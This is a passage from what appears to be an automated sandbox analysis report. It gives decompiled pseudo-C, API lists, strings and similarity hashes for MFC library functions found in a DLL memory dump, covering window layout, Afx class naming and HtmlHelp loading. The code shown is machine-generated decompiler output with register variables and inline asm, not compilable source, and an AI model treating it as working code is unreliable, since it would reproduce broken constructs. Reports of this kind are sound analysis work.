				long _v48;
				intOrPtr _v52;
				char _v56;
				struct tagRECT _v72;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t77;
				char _t79;
				signed int _t80;
				signed int _t84;
				signed int _t87;
				intOrPtr _t92;
				signed int _t93;
				char _t94;
				signed int _t101;
				intOrPtr* _t123;
				long _t128;
				intOrPtr* _t131;
				void* _t133;
				intOrPtr _t134;
				signed int _t136;
				intOrPtr _t137;
				intOrPtr _t140;
				intOrPtr _t141;
				intOrPtr _t143;
				void* _t144;

				_t133 = __edx;
				_t140 = _a4;
				_t144 = __ecx;
				_t148 = _t140;
				if(_t140 == 0) {
					E1000A5CD(0, __ecx, _t140, __ecx, _t148);
				}
				if( *((intOrPtr*)(_t144 + 0x7c)) != 0) {
					__eflags = _a12;
					if(_a12 != 0) {
						GetClientRect( *(_t144 + 0x20),  &_v72);
						GetWindowRect( *(_t144 + 0x20),  &_v24);
						E1000AF3F(_t144,  &_v24);
						OffsetRect( &_v72,  ~(_v24.left),  ~(_v24.top));
					}
					__eflags =  *(_t144 + 0x84) & 0x0000a000;
					if(__eflags == 0) {
						_push( &(_v24.right));
						_push(1);
						_push(0);
						_push(0);
						_push(1);
						_push( *((intOrPtr*)(_t140 + 4)));
						_v8 = 1;
						_push( *((intOrPtr*)(_t144 + 0x7c)));
						_t77 = E1002AA0B(0,  &(_v24.right), _t140, __eflags);
						__eflags = _t77;
						if(_t77 < 0) {
							goto L3;
						}
						_t123 = _a8;
						__eflags = _a12;
						_t119 =  *((intOrPtr*)(_t123 + 4));
						if(_a12 == 0) {
							_v36 = _t119;
						} else {
							_t87 = _v72.top - _t119;
							__eflags = _t87 - _v24.bottom;
							if(_t87 < _v24.bottom) {
								_t87 = _t87 - 1;
								__eflags = _t87;
							}
							asm("cdq");
							_v36 = (_t87 - _v24.bottom - _t133 >> 1) + _t119;
						}
						_t141 =  *_t123;
						_t134 =  *((intOrPtr*)(_t144 + 0x64));
						_t79 = _t134 + _t141;
						_t142 = _v36;
						_t128 =  *((intOrPtr*)(_t123 + 8)) -  *((intOrPtr*)(_t144 + 0x68)) - _t134 - _t141 + _t79;
						_t136 = _v24.bottom + _v36;
						__eflags = _t136;
						_v40 = _t79;
						_v56 = _t79;
						_t80 = _v72.top;
						_v32 = _t128;
						_v28 = _t136;
						_v48 = _t128;
						_v52 = _t119;
						goto L21;
					} else {
						_t92 = 2;
						_push( &(_v24.right));
						_push(1);
						_push(0);
						_push(0);
						_push(_t92);
						_push( *((intOrPtr*)(_t140 + 4)));
						_v8 = _t92;
						_push( *((intOrPtr*)(_t144 + 0x7c)));
						_t93 = E1002AA0B(0,  &(_v24.right), _t140, __eflags);
						__eflags = _t93;
						if(_t93 < 0) {
							goto L3;
						}
						_t131 = _a8;
						__eflags = _a12;
						if(__eflags == 0) {
							_t94 =  *_t131;
							_a8 = _t94;
						} else {
							_t143 =  *_t131;
							_t101 = _v72.left - _t143;
							__eflags = _t101 - _v24.right;
							_a8 = _t143;
							if(__eflags < 0) {
								_t101 = _t101 - 1;
								__eflags = _t101;
							}
							asm("cdq");
							_t94 = (_t101 - _v24.right - _t133 >> 1) + _t143;
						}
						_t137 =  *((intOrPtr*)(_t144 + 0x64));
						_t142 =  *((intOrPtr*)(_t131 + 4));
						_v40 = _t94;
						_v36 = _t142 + _t137;
						_t119 = _v24.right;
						_v32 = _t94 + _v24.right;
						_t128 = _v36;
						_v56 = _a8;
						_t80 =  *((intOrPtr*)(_t131 + 0xc)) -  *((intOrPtr*)(_t144 + 0x68)) - _t142 - _t137 + _t128;
						_v28 = _t80;
						_v48 = _v72.left;
						_v52 = _t128;
						L21:
						_v44 = _t80;
						_push( &_v56);
						_push( &_v40);
						_push(0);
						_push(_v8);
						_push( *((intOrPtr*)(_a4 + 4)));
						_push( *((intOrPtr*)(_t144 + 0x7c)));
						_t84 = E1002A9B3(_t119, _t128, _t142, __eflags);
						__eflags = _t84;
						_t74 = _t84 >= 0;
						__eflags = _t74;
						return 0 | _t74;
					}
				} else {
					L3:
					return 0;
				}
			}

0x10013c84
0x10013c8f
0x10013c94
0x10013c96
0x10013c98
0x10013c9a
0x10013c9a
0x10013ca2
0x10013cab
0x10013cae
0x10013cb7
0x10013cc4
0x10013cd0
0x10013ce5
0x10013ce5
0x10013ceb
0x10013cf8
0x10013d7f
0x10013d83
0x10013d84
0x10013d85
0x10013d86
0x10013d87
0x10013d8a
0x10013d8d
0x10013d90
0x10013d98
0x10013d9a
0x00000000
0x00000000
0x10013da0
0x10013da3
0x10013da6
0x10013da9
0x10013dc5
0x10013dab
0x10013dae
0x10013db0
0x10013db3
0x10013db5
0x10013db5
0x10013db5
0x10013db9
0x10013dc0
0x10013dc0
0x10013dc8
0x10013dd0
0x10013dd3
0x10013ddd
0x10013de0
0x10013de2
0x10013de2
0x10013de4
0x10013de7
0x10013dea
0x10013ded
0x10013df0
0x10013df3
0x10013df6
0x00000000
0x10013cfe
0x10013d00
0x10013d01
0x10013d02
0x10013d04
0x10013d05
0x10013d06
0x10013d07
0x10013d0a
0x10013d0d
0x10013d10
0x10013d18
0x10013d1a
0x00000000
0x00000000
0x10013d1c
0x10013d1f
0x10013d22
0x10013d40
0x10013d42
0x10013d24
0x10013d24
0x10013d29
0x10013d2b
0x10013d2e
0x10013d31
0x10013d33
0x10013d33
0x10013d33
0x10013d37
0x10013d3c
0x10013d3c
0x10013d45
0x10013d48
0x10013d4e
0x10013d51
0x10013d54
0x10013d59
0x10013d62
0x10013d6c
0x10013d72
0x10013d74
0x10013d77
0x10013d7a
0x10013df9
0x10013df9
0x10013dff
0x10013e03
0x10013e07
0x10013e09
0x10013e0c
0x10013e0f
0x10013e12
0x10013e1c
0x10013e1e
0x10013e1e
0x00000000
0x10013e21
0x10013ca4
0x10013ca4
0x00000000
0x10013ca4

APIs

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

GetClientRect.USER32 ref: 10013CB7
GetWindowRect.USER32 ref: 10013CC4

Part of subcall function 1000AF3F: ScreenToClient.USER32 ref: 1000AF50
Part of subcall function 1000AF3F: ScreenToClient.USER32 ref: 1000AF5D

OffsetRect.USER32(?,?,?), ref: 10013CE5

Part of subcall function 1002AA0B: __EH_prolog3.LIBCMT ref: 1002AA12

Strings

n^t, xrefs: 10013CB7

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientRect$H_prolog3Screen$Exception@8OffsetThrowWindow
String ID: n^t
API String ID: 3638146424-440804003
Opcode ID: 591e84299a39ddd67794142e7dd182b2e2a769807ae318443a473078afac31eb
Instruction ID: 1558659ad95438d5dedb6850d179a0db34a21a1ab1baf13d390a1203b92c822f
Opcode Fuzzy Hash: 591e84299a39ddd67794142e7dd182b2e2a769807ae318443a473078afac31eb
Instruction Fuzzy Hash: 89511AB1A0060AEFCB00CFA9D9819AEBBF9FF48304F648529E515E7215E731EA41CF50

Uniqueness

Uniqueness Score: -1.00%

Function 1001DABF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 145
windowCOMMON

Download Yara Rule

C-Code - Quality: 97%

			E1001DABF(void* __ecx) {
				int _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				struct tagRECT _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				void* _v60;
				intOrPtr _v72;
				intOrPtr _v76;
				signed int _v80;
				intOrPtr _v84;
				char _v88;
				void* __ebx;
				void* _t51;
				void* _t55;
				int _t65;
				long _t75;
				void* _t78;
				intOrPtr _t79;
				char _t96;
				void* _t98;
				void* _t101;

				_t82 = __ecx;
				_t101 = __ecx;
				if( *((intOrPtr*)(__ecx + 0x84)) != 0) {
					return _t51;
				}
				_push(_t78);
				 *((intOrPtr*)(__ecx + 0x84)) = 1;
				_v8 = 1;
				_t55 = E1000EBE9(_t78, _t82, GetParent( *(__ecx + 0x20)));
				if(_t55 == 0) {
					L4:
					__eflags = E1001D984(_t101, __eflags,  &_v28,  &_v20);
					if(__eflags != 0) {
						_t79 = _v24;
						_t96 = _v28;
						L10:
						E1001DA01(_t101, _t104, _t96, _t79,  &_v12,  &(_v44.right),  &_v28, _v8);
						if(_v12 != 0) {
							_t79 = _t79 - _v16;
						}
						if(_v8 != 0) {
							_t96 = _t96 - _v20;
						}
						E1001D409(_t101, _v28, _v24);
						_v80 = _v80 & 0x00000000;
						_v84 = 3;
						E1000D8C5(_t101, 0, _v12);
						if(_v12 == 0) {
							_t98 = 1;
							__eflags = 1;
						} else {
							_v72 = _t96;
							_v76 =  *((intOrPtr*)(_t101 + 0x68)) - 1;
							_t98 = 1;
							if(E1000CB64(_t101, 0,  &_v88, 1) == 0) {
								E1000D85A(_t101, _t72, _t72, _v44.right, 1);
							}
						}
						_t65 = E1000D8C5(_t101, _t98, _v8);
						if(_v8 != 0) {
							_v76 =  *((intOrPtr*)(_t101 + 0x6c)) - 1;
							_v72 = _t79;
							_t65 = E1000CB64(_t101, _t98,  &_v88, _t98);
							if(_t65 == 0) {
								_t65 = E1000D85A(_t101, _t98, _t65, _v44.bottom, _t98);
							}
						}
						 *(_t101 + 0x84) =  *(_t101 + 0x84) & 0x00000000;
						L22:
						return _t65;
					}
					_t65 = GetClientRect( *(_t101 + 0x20),  &_v44);
					__eflags = _v44.right;
					if(_v44.right > 0) {
						__eflags = _v44.bottom;
						if(_v44.bottom > 0) {
							_t65 = E1000D8C5(_t101, 3, 0);
						}
					}
					 *(_t101 + 0x84) = 0;
					goto L22;
				}
				_t75 = SendMessageA( *(_t55 + 0x20), 0x368, 0,  &_v60);
				_t104 = _t75;
				if(_t75 == 0) {
					goto L4;
				} else {
					_v8 = 0;
					E1001D45D(_t101,  &_v20);
					_t96 = _v52 - _v60;
					_t79 = _v48 - _v56;
					goto L10;
				}
			}

0x1001dabf
0x1001dac9
0x1001dad3
0x1001dc3a
0x1001dc3a
0x1001dad9
0x1001dae0
0x1001dae6
0x1001daf0
0x1001daf7
0x1001db2c
0x1001db3b
0x1001db3d
0x1001db6b
0x1001db6e
0x1001db71
0x1001db84
0x1001db8d
0x1001db8f
0x1001db8f
0x1001db96
0x1001db98
0x1001db98
0x1001dba3
0x1001dbab
0x1001dbb3
0x1001dbba
0x1001dbc3
0x1001dbf5
0x1001dbf5
0x1001dbc5
0x1001dbc8
0x1001dbce
0x1001dbd1
0x1001dbe2
0x1001dbec
0x1001dbec
0x1001dbe2
0x1001dbfc
0x1001dc05
0x1001dc0b
0x1001dc16
0x1001dc19
0x1001dc20
0x1001dc2a
0x1001dc2a
0x1001dc20
0x1001dc2f
0x1001dc36
0x00000000
0x1001dc36
0x1001db46
0x1001db4c
0x1001db4f
0x1001db51
0x1001db54
0x1001db5b
0x1001db5b
0x1001db54
0x1001db60
0x00000000
0x1001db60
0x1001db06
0x1001db0c
0x1001db0e
0x00000000
0x1001db10
0x1001db16
0x1001db19
0x1001db24
0x1001db27
0x00000000
0x1001db27

APIs

GetParent.USER32(?), ref: 1001DAE9
SendMessageA.USER32(?,00000368,00000000,?), ref: 1001DB06
GetClientRect.USER32 ref: 1001DB46

Strings

n^t, xrefs: 1001DB46

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: ClientMessageParentRectSend
String ID: n^t
API String ID: 608431981-440804003
Opcode ID: 631523b9ef03ec0803ffd7339d7243aae060e23ac91fcb1d6c5bdc04e09c61a5
Instruction ID: 7d6fd44daec8258274cac615d11a01537c53064dc07314be83292dabf736bf09
Opcode Fuzzy Hash: 631523b9ef03ec0803ffd7339d7243aae060e23ac91fcb1d6c5bdc04e09c61a5
Instruction Fuzzy Hash: 88517E72900219EFDF11EBA5CD85BEFBBB9FF88740F11451AE502A7140DB70AA81DB60

Uniqueness

Uniqueness Score: -1.00%

Function 10011A99, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 95
COMMON

Download Yara Rule

C-Code - Quality: 75%

			E10011A99(void* __ecx, void* __eflags, char _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				char _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr* _t33;
				intOrPtr* _t35;
				intOrPtr* _t36;
				void* _t38;
				intOrPtr* _t52;
				void* _t54;
				intOrPtr _t55;
				void* _t58;
				void* _t60;
				intOrPtr _t62;

				_t62 = E1001EB50(_t54, _t58, _t60, __eflags) + 0x7c;
				_t55 =  *((intOrPtr*)(E1001F108(_t54, _t58, _t62, __eflags) + 8));
				if(_a8 != 0 || _a12 != 0) {
					L4:
					_v8 =  *((intOrPtr*)(E1004223E(__eflags)));
					_t33 = E1004223E(__eflags);
					_push(_a16);
					 *_t33 = 0;
					_push(_a12);
					_push(_a8);
					_push(_a4);
					E1004235A(_t62, 0x60, 0x5f, "Afx:%p:%x:%p:%p:%p", _t55);
					goto L5;
				} else {
					_t69 = _a16;
					if(_a16 != 0) {
						goto L4;
					}
					_v8 =  *((intOrPtr*)(E1004223E(_t69)));
					_t52 = E1004223E(_t69);
					_push(_a4);
					 *_t52 = 0;
					E1004235A(_t62, 0x60, 0x5f, "Afx:%p:%x", _t55);
					L5:
					_t35 = E1004223E(_t69);
					_t70 =  *_t35;
					if( *_t35 == 0) {
						_t36 = E1004223E(__eflags);
						_t57 = _v8;
						 *_t36 = _v8;
					} else {
						E1000BDCF( *((intOrPtr*)(E1004223E(_t70))));
						_pop(_t57);
					}
					_push( &_v48);
					_push(_t62);
					_push(_t55);
					_t38 = E1000D1C0(_t55, _t57, 0, _t62, _t70);
					_t71 = _t38;
					if(_t38 == 0) {
						_v48 = _a4;
						_v44 = DefWindowProcA;
						_v28 = _a16;
						_v24 = _a8;
						_v20 = _a12;
						_push( &_v48);
						_v36 = 0;
						_v40 = 0;
						_v32 = _t55;
						_v16 = 0;
						_v12 = _t62;
						if(E10011A0C(_t55, _t57, 0, _t62, _t71) == 0) {
							E1000AB23(_t57);
						}
					}
					return _t62;
				}
			}

0x10011aab
0x10011ab3
0x10011abb
0x10011af0
0x10011af7
0x10011afa
0x10011aff
0x10011b02
0x10011b04
0x10011b07
0x10011b0a
0x10011b18
0x00000000
0x10011ac2
0x10011ac2
0x10011ac5
0x00000000
0x00000000
0x10011ace
0x10011ad1
0x10011ad6
0x10011ad9
0x10011ae6
0x10011b20
0x10011b20
0x10011b25
0x10011b27
0x10011b38
0x10011b3d
0x10011b40
0x10011b29
0x10011b30
0x10011b35
0x10011b35
0x10011b45
0x10011b46
0x10011b47
0x10011b48
0x10011b50
0x10011b52
0x10011b57
0x10011b5f
0x10011b65
0x10011b6b
0x10011b71
0x10011b77
0x10011b78
0x10011b7b
0x10011b7e
0x10011b81
0x10011b84
0x10011b8e
0x10011b90
0x10011b90
0x10011b8e
0x10011b9b
0x10011b9b

APIs

__snwprintf_s.LIBCMT ref: 10011AE6

Part of subcall function 1004235A: __vsnprintf_s_l.LIBCMT ref: 10042371

__snwprintf_s.LIBCMT ref: 10011B18

Part of subcall function 1004223E: __getptd_noexit.LIBCMT ref: 1004223E

Strings

Afx:%p:%x, xrefs: 10011ADC
Afx:%p:%x:%p:%p:%p, xrefs: 10011B0E

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: __snwprintf_s$__getptd_noexit__vsnprintf_s_l
String ID: Afx:%p:%x$Afx:%p:%x:%p:%p:%p
API String ID: 3087765582-2801496823
Opcode ID: 7aea769ca1a713241195bde6be0ac00490f22f12c26e046432e949cf31846e80
Instruction ID: e551209dd1b288a36ad1c99f96294df823c4e518bf43fd1b910843b92b7eabdc
Opcode Fuzzy Hash: 7aea769ca1a713241195bde6be0ac00490f22f12c26e046432e949cf31846e80
Instruction Fuzzy Hash: B9319278D00209AFCB11DFA4C9419DE7BF5EF48290F504026FD14AB211E774AE81DB65

Uniqueness

Uniqueness Score: -1.00%

Function 1001017E, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 90%

			E1001017E(void* __ebx, void* __edi, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* __esi;
				void* __ebp;
				struct HINSTANCE__* _t16;
				_Unknown_base(*)()* _t17;
				void* _t25;
				void* _t26;
				void* _t27;

				_t27 = __eflags;
				_t24 = __edi;
				_t21 = __ebx;
				E10026F7B(0xc);
				_push(0x1000f35d);
				_t26 = E10028772(__ebx, 0x100942a8, __edi, _t25, _t27);
				_t28 = _t26;
				if(_t26 == 0) {
					E1000A5CD(__ebx, 0x100942a8, __edi, _t26, _t28);
				}
				_t29 =  *(_t26 + 8);
				if( *(_t26 + 8) != 0) {
					L7:
					E10026FED(0xc);
					return  *(_t26 + 8)(_a4, _a8, _a12, _a16);
				} else {
					_push("hhctrl.ocx");
					_t16 = E1000D397(_t21, 0x100942a8, _t24, _t26, _t29);
					 *(_t26 + 4) = _t16;
					if(_t16 != 0) {
						_t17 = GetProcAddress(_t16, "HtmlHelpA");
						 *(_t26 + 8) = _t17;
						__eflags = _t17;
						if(_t17 != 0) {
							goto L7;
						}
						FreeLibrary( *(_t26 + 4));
						 *(_t26 + 4) =  *(_t26 + 4) & 0x00000000;
					}
					return 0;
				}
			}

0x1001017e
0x1001017e
0x1001017e
0x10010186
0x1001018b
0x1001019a
0x1001019c
0x1001019e
0x100101a0
0x100101a0
0x100101a5
0x100101a9
0x100101e3
0x100101e5
0x00000000
0x100101ab
0x100101ab
0x100101b0
0x100101b6
0x100101bb
0x100101c7
0x100101cd
0x100101d0
0x100101d2
0x00000000
0x00000000
0x100101d7
0x100101dd
0x100101dd
0x00000000
0x100101bd

APIs

Part of subcall function 10026F7B: EnterCriticalSection.KERNEL32(100944C0,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FB5
Part of subcall function 10026F7B: InitializeCriticalSection.KERNEL32(?,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FC7
Part of subcall function 10026F7B: LeaveCriticalSection.KERNEL32(100944C0,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FD4
Part of subcall function 10026F7B: EnterCriticalSection.KERNEL32(?,00000000,?,?,?,1002878D,00000010,00000008,1001F136,1001F0D9,1000A5E9,1001F140,1000B425,00000000,1000B4DC,00000000), ref: 10026FE4

Part of subcall function 10028772: __EH_prolog3_catch.LIBCMT ref: 10028779

Part of subcall function 1000A5CD: __CxxThrowException@8.LIBCMT ref: 1000A5E3
Part of subcall function 1000A5CD: __EH_prolog3.LIBCMT ref: 1000A5F0

GetProcAddress.KERNEL32(00000000,HtmlHelpA), ref: 100101C7
FreeLibrary.KERNEL32(?), ref: 100101D7

Strings

hhctrl.ocx, xrefs: 100101AB
HtmlHelpA, xrefs: 100101C1

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: CriticalSection$Enter$AddressException@8FreeH_prolog3H_prolog3_catchInitializeLeaveLibraryProcThrow
String ID: HtmlHelpA$hhctrl.ocx
API String ID: 2853499158-63838506
Opcode ID: 47c0c778c31e5aa09947645722386dc747bc2b2c5c5b0aea536ffd3288c4e0ac
Instruction ID: d3e6e42e82067d1be4c4159ea70727fb18362812c000b6a8f925b343e4d0c7c8
Opcode Fuzzy Hash: 47c0c778c31e5aa09947645722386dc747bc2b2c5c5b0aea536ffd3288c4e0ac
Instruction Fuzzy Hash: 9301D635200B47BBEB12DF60EC05F4E7EE4EF04391F118518F99999450DBB4E590A611

Uniqueness

Uniqueness Score: -1.00%

Function 10016ECE, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 42
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E10016ECE(void* __ecx, void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				struct tagRECT _v20;
				int _t15;
				void* _t29;

				_t29 = __ecx;
				E1001E2E4(__ecx, __eflags, _a4, _a8, _a12);
				_t15 = IsWindow( *(_t29 + 0xbc));
				if(_t15 != 0) {
					GetClientRect( *(_t29 + 0x20),  &_v20);
					AdjustWindowRectEx( &_v20, E10012193(_t29 + 0x9c), 0, 0x200);
					return E1001254C(_t29 + 0x9c, 0, _v20.left, _v20.top, _v20.right - _v20.left, _v20.bottom - _v20.top, 0x14);
				}
				return _t15;
			}

0x10016eda
0x10016ee2
0x10016eed
0x10016ef5
0x10016efe
0x10016f1d
0x00000000
0x10016f3d
0x10016f44

APIs

IsWindow.USER32(?), ref: 10016EED
GetClientRect.USER32 ref: 10016EFE

Part of subcall function 10012193: GetWindowLongA.USER32 ref: 1001219E

AdjustWindowRectEx.USER32(?,00000000,00000000,00000200), ref: 10016F1D

Part of subcall function 1001254C: SetWindowPos.USER32(C033D88B,000000FF,?,?,00000000,1000E76C,?,?,1000E76C,00000000,?,?,000000FF,000000FF,00000015), ref: 10012574

Strings

n^t, xrefs: 10016EFE

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: Window$Rect$AdjustClientLong
String ID: n^t
API String ID: 4153926409-440804003
Opcode ID: 9a699819ad1afe684db244a3889c2fc7b71690320dc30330865e12d32d49e0b2
Instruction ID: 47d091347ad39cef30ed35c4e2408ace729f5ec492ee603fc91e4b2ea006294e
Opcode Fuzzy Hash: 9a699819ad1afe684db244a3889c2fc7b71690320dc30330865e12d32d49e0b2
Instruction Fuzzy Hash: FF014F76900218FFEF11DFA4DC49FAF7B79FB08300F000414F919A61A1DA31A950DB50

Uniqueness

Uniqueness Score: -1.00%

Function 10029B41, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 54%

			E10029B41(intOrPtr _a4) {
				signed int _v8;
				char _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t6;
				struct HINSTANCE__* _t9;
				intOrPtr _t11;
				intOrPtr _t15;
				CHAR* _t16;
				CHAR* _t17;
				signed int _t18;

				_t6 =  *0x1006d940; // 0xc2bf211
				_v8 = _t6 ^ _t18;
				_t11 = _a4;
				_t17 = "mfcm90.dll";
				_t16 =  &_v20;
				asm("movsd");
				asm("movsd");
				asm("movsw");
				asm("movsb");
				_t9 = GetModuleHandleA( &_v20);
				if(_t9 != 0) {
					_t9 = GetProcAddress(_t9, "AfxmReleaseManagedReferences");
					if(_t9 != 0) {
						_t9 = _t9->i(_t11);
					}
				}
				return E1003F29E(_t9, _t11, _v8 ^ _t18, _t15, _t16, _t17);
			}

0x10029b49
0x10029b50
0x10029b54
0x10029b59
0x10029b5e
0x10029b61
0x10029b62
0x10029b63
0x10029b69
0x10029b6a
0x10029b72
0x10029b7a
0x10029b82
0x10029b85
0x10029b87
0x10029b82
0x10029b96

APIs

GetModuleHandleA.KERNEL32(?,1005BCA4,?,00000000), ref: 10029B6A
GetProcAddress.KERNEL32(00000000,AfxmReleaseManagedReferences), ref: 10029B7A

Strings

AfxmReleaseManagedReferences, xrefs: 10029B74
mfcm90.dll, xrefs: 10029B59

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674167271.000000001006C000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674181289.000000001006F000.00000008.00020000.sdmp Download File
Associated: 00000002.00000002.674237997.0000000010092000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674245567.0000000010094000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.674256225.0000000010097000.00000002.00020000.sdmp Download File

Similarity

API ID: AddressHandleModuleProc
String ID: AfxmReleaseManagedReferences$mfcm90.dll
API String ID: 1646373207-1752160237
Opcode ID: ad92bd60f853d936fdc3aa20fa893173fbcc7db38fad278cf94802af16fa2526
Instruction ID: 0dee8eb96644ac8ab1f4fc57cf45a988e1caedf829ba775e62eb06757de9953d
Opcode Fuzzy Hash: ad92bd60f853d936fdc3aa20fa893173fbcc7db38fad278cf94802af16fa2526
Instruction Fuzzy Hash: 41F08275600218AB9B00EF6AAC88DEFBBECFFDC2527400469F911E7141DF70EA048670

Uniqueness

Uniqueness Score: -1.00%

Function 1004B5AF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 38
libraryloaderCOMMON

Download Yara Rule

C-Code - Quality: 65%

			E1004B5AF() {
				signed long long _v12;
				signed int _v20;
				signed long long _v28;
				signed char _t8;

				_t8 = GetModuleHandleA("KERNEL32");
				if(_t8 == 0) {
					L6:
					_v20 =  *0x1005e3a8;
					_v28 =  *0x1005e3a0;
					asm("fsubr qword [ebp-0x18]");
					_v12 = _v28 / _v20 * _v20;
					asm("fld1");
					asm("fcomp qword [ebp-0x8]");
					asm("fnstsw ax");
					if((_t8 & 0x00000005) != 0) {
						return 0;
					} else {
						return 1;
					}
				} else {
					__eax = GetProcAddress(__eax, "IsProcessorFeaturePresent");
					if(__eax == 0) {
						goto L6;
					} else {
						_push(0);
						return __eax;
					}
				}
			}

0x1004b5b4
0x1004b5bc
0x1004b5d3
0x1004b57f
0x1004b588
0x1004b594
0x1004b597
0x1004b59a
0x1004b59c
0x1004b59f
0x1004b5a4
0x1004b5ae
0x1004b5a6
0x1004b5aa
0x1004b5aa
0x1004b5be
0x1004b5c4
0x1004b5cc
0x00000000
0x1004b5ce
0x1004b5ce
0x1004b5d2
0x1004b5d2
0x1004b5cc

APIs

GetModuleHandleA.KERNEL32(KERNEL32,1004317E), ref: 1004B5B4
GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 1004B5C4

Strings

KERNEL32, xrefs: 1004B5AF
IsProcessorFeaturePresent, xrefs: 1004B5BE

Memory Dump Source

Source File: 00000002.00000002.674006605.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000002.00000002.673990103.0000000010000000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.674105190.0000000010056000.00000002.00020000.sdmp Download File
